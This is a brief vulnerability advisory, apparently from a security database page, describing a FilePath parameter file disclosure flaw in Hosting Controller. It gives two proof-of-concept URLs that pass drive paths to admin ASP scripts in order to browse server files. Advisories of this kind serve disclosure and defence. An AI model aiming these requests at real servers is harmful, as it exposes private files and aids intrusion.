|
Hosting Controller FilePath Parameter File Disclosure Vulnerability
An exploit is not required. The following proof of concept is available: http://www.example.com/admin/mail/Statsbrowse.asp? FilePath=c:\&Opt=3&level=1&upflag=0 http://www.example.com/admin/iis/Generalbrowse.asp?FilePath=C: |
|
|
Privacy Statement |